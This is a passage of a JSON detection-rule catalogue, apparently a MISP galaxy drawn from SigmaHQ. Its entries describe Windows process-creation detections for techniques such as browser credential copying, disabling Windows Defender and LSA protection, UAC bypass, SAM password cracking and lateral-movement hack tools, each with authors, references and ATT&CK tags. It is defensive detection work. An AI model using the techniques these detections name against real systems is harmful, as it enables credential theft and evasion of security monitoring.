"2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b6457d63-d2a2-4e29-859d-4e7affc153d1", "value": "Potential Discovery Activity Via Dnscmd.EXE" }, { "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", "https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "value": "Potential Renamed Rundll32 Execution" }, { "description": "Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to \"%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\\"\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_installutil_download.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/239", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_installutil_download.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", "value": "File Download Via InstallUtil.EXE" }, { "description": "Detects password change for the logged-on user's via \"ksetup.exe\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-06", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_ksetup_password_change_user.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_user.yml" ], "tags": [ "attack.execution" ] }, "uuid": "c9783e20-4793-4164-ba96-d9ee483992c4", "value": "Logged-On User Password Change Via Ksetup.EXE" }, { "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_copy_browser_data.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_browser_data.yml" ], "tags": [ "attack.credential-access", "attack.t1555.003" ] }, "related": [ { "dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", "value": "Potential Browser Data Stealing" }, { "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", "meta": { "author": "Florian Roth (Nextron Systems), oscd.community", "creation_date": "2019-01-29", "falsepositive": [ "Legitimate administration activity" ], "filename": "proc_creation_win_netsh_port_forwarding_3389.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "value": "RDP Port Forwarding Rule Added Via Netsh.EXE" }, { "description": "Detects attackers attempting to disable Windows Defender using Powershell", "meta": { "author": "ok @securonix invrep-de, oscd.community, frack113", "creation_date": "2020-10-12", "falsepositive": [ "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/", "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7ee1722-c3c5-aeff-3212-c777e4733217", "value": "Disable Windows Defender AV Security Monitoring" }, { "description": "Detects the usage of the \"reg.exe\" utility to disable PPL protection on the LSA process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_reg_lsa_ppl_protection_disabled.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.010" ] }, "related": [ { "dest-uuid": "824add00-99a1-4b15-9a2d-6c5683b7b497", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9", "value": "LSA PPL Protection Disabled Via Reg.EXE" }, { "description": "Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-03-23", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_sysinternals_pssuspend_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/pssuspend", "https://twitter.com/0gtweet/status/1638069413717975046", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4beb6ae0-f85b-41e2-8f18-8668abc8af78", "value": "Sysinternals PsSuspend Suspicious Execution" }, { "description": "Detects execution of \"aspnet_compiler.exe\" which can be abused to compile and execute C# code.", "meta": { "author": "frack113", "creation_date": "2021-11-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_aspnet_compiler_exectuion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_exectuion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1127" ] }, "related": [ { "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", "value": "AspNetCompiler Execution" }, { "description": "The Devtoolslauncher.exe executes other binary", "meta": { "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", "creation_date": "2019-10-12", "falsepositive": [ "Legitimate use of devtoolslauncher.exe by legitimate user" ], "filename": "proc_creation_win_lolbin_devtoolslauncher.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_felamos/status/1179811992841797632", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", "value": "Devtoolslauncher.exe Executes Specified Binary" }, { "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "value": "UAC Bypass via Windows Firewall Snap-In Hijack" }, { "description": "Detects the execution of an AnyDesk binary with a version prior to 8.0.8.\nPrior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.\nUse this rule to detect instances of older versions of Anydesk using the compromised certificate\nThis is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.\n", "meta": { "author": "Sai Prashanth Pulisetti, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2024-02-08", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/", "https://anydesk.com/en/changelog/windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_revoked_cert.yml" ], "tags": [ "attack.execution", "attack.initial-access" ] }, "uuid": "41f407b5-3096-44ea-a74f-96d04fbc41be", "value": "Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate" }, { "description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "creation_date": "2019-02-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_csc_susp_parent.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://reaqta.com/2017/11/short-journey-darkvnc/", "https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing", "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml" ], "tags": [ "attack.execution", "attack.t1059.005", "attack.t1059.007", "attack.defense-evasion", "attack.t1218.005", "attack.t1027.004" ] }, "related": [ { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "840a987a-99bd-4a80-a5c9-0cb2baa6cade", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c726e0a2-a57a-4b7b-a973-d0f013246617", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "value": "Csc.EXE Execution Form Potentially Suspicious Parent" }, { "description": "Detects the execution of SharpMove, a .NET utility performing multiple tasks such as \"Task Creation\", \"SCM\" query, VBScript execution using WMI via its PE metadata and command line options.\n", "meta": { "author": "Luca Di Bartolomeo (CrimpSec)", "creation_date": "2024-01-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharpmove.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/0xthirteen/SharpMove/", "https://pentestlab.blog/tag/sharpmove/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "055fb54c-a8f4-4aee-bd44-f74cf30a0d9d", "value": "HackTool - SharpMove Tool Execution" }, { "description": "Detects the execution of \"reg.exe\" to alter registry keys that would replace the user's desktop background.\nThis is a common technique used by malware to change the desktop background to a ransom note or other image.\n", "meta": { "author": "Stephen Lincoln @slincoln-aiq (AttackIQ)", "creation_date": "2023-12-21", "falsepositive": [ "Administrative scripts that change the desktop background to a company logo or other image." ], "filename": "proc_creation_win_reg_desktop_background_change.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI", "https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/", "https://www.attackiq.com/2023/09/20/emulating-rhysida/", "https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior", "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1112", "attack.t1491.001" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8cbc9475-8d05-4e27-9c32-df960716c701", "value": "Potentially Suspicious Desktop Background Change Using Reg.EXE" }, { "description": "VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "meta": { "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "creation_date": "2022-06-01", "falsepositive": [ "Legitimate testing of Microsoft UI parts." ], "filename": "proc_creation_win_lolbin_visualuiaverifynative.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad", "https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/design/applications-that-can-bypass-wdac", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b30a8bc5-e21b-4ca2-9420-0a94019ac56a", "value": "Use of VisualUiaVerifyNative.exe" }, { "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc_as_system.yml" ], "tags": [ "attack.execution" ] }, "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", "value": "PsExec Service Child Process Execution as LOCAL SYSTEM" }, { "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_computersystem.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "value": "Computer System Reconnaissance Via Wmic.EXE" }, { "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", "meta": { "author": "Sai Prashanth Pulisetti @pulisettis", "creation_date": "2022-12-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_impersonate.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", "https://github.com/sensepost/impersonate", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_impersonate.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1134.001", "attack.t1134.003" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", "value": "HackTool - Impersonate Execution" }, { "description": "Detects calls to \"SyncInvoke\" that is part of the \"CL_Invocation.ps1\" script to proxy execution using \"System.Diagnostics.Process\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova", "creation_date": "2020-10-14", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_cl_invocation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/948061991012327424", "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_invocation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1216" ] }, "related": [ { "dest-uuid": "f6fe9070-7a65-49ea-ae72-76292f42cebe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", "value": "Potential Process Execution Proxy Via CL_Invocation.ps1" }, { "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-16", "falsepositive": [ "Legitimate use of PsService by an administrator" ], "filename": "proc_creation_win_sysinternals_psservice.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/psservice", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psservice.yml" ], "tags": [ "attack.discovery", "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", "value": "Sysinternals PsService Execution" }, { "description": "Detects potentially suspicious child processes of a ClickOnce deployment application", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_dfsvc_suspicious_child_processes.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dfsvc_suspicious_child_processes.yml" ], "tags": [ "attack.execution", "attack.defense-evasion" ] }, "uuid": "67bc0e75-c0a9-4cfc-8754-84a505b63c04", "value": "Potentially Suspicious Child Process Of ClickOnce Application" }, { "description": "Use of the commandline to shutdown or reboot windows", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_shutdown_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_execution.yml" ], "tags": [ "attack.impact", "attack.t1529" ] }, "related": [ { "dest-uuid": "ff73aa03-0090-4464-83ac-f89e233c02bc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", "value": "Suspicious Execution of Shutdown" }, { "description": "Detects potentially suspicious child processes of \"Diskshadow.exe\". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-15", "falsepositive": [ "False postitve can occur in cases where admin scripts levreage the \"exec\" flag to execute applications" ], "filename": "proc_creation_win_diskshadow_child_process_susp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/diskshadow", "https://www.zscaler.com/blogs/security-research/technical-analysis-crytox-ransomware", "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", "https://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/", "https://www.lifars.com/wp-content/uploads/2022/01/GriefRansomware_Whitepaper-2.pdf", "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", "https://medium.com/@cyberjyot/lolbin-execution-via-diskshadow-f6ff681a27a4", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_diskshadow_child_process_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f546b25-5f12-4c8d-8532-5893dcb1e4b8", "value": "Potentially Suspicious Child Process Of DiskShadow.EXE" }, { "description": "Detects calls to the \"terminate\" function via wmic in order to kill an application", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-11", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_terminate_application.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf", "https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "49d9671b-0a0a-4c09-8280-d215bfd30662", "value": "Application Terminated Via Wmic.EXE" }, { "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", "meta": { "author": "frack113", "creation_date": "2022-08-28", "falsepositive": [ "Legitimate use of Nim on a developer systems" ], "filename": "proc_creation_win_pua_nimgrab.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/28d190330fe44de6ff4767fc400cc10fa7cd6540/atomics/T1105/T1105.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nimgrab.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "74a12f18-505c-4114-8d0b-8448dd5485c6", "value": "PUA - Nimgrab Execution" }, { "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", "meta": { "author": "frack113", "creation_date": "2022-01-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_evil_winrm.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/Hackplayers/evil-winrm", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.006" ] }, "related": [ { "dest-uuid": "60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", "value": "HackTool - WinRM Access Via Evil-WinRM" }, { "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", "meta": { "author": "frack113", "creation_date": "2021-12-27", "falsepositive": [ "Tools that use similar command line flags and values" ], "filename": "proc_creation_win_hktl_hashcat.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat", "https://hashcat.net/wiki/doku.php?id=hashcat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" ], "tags": [ "attack.credential-access", "attack.t1110.002" ] }, "related": [ { "dest-uuid": "1d24cdee-9ea2-4189-b08e-af110bf2435d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "value": "HackTool - Hashcat Password Cracker Execution" }, { "description": "Detects the execution of \"forfiles\" from a non-default location, in order to potentially spawn a custom \"cmd.exe\" from the current working directory.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Anish Bogati", "creation_date": "2024-01-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_forfiles_child_process_masquerading.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2023/12/31/1-little-known-secret-of-forfiles-exe/", 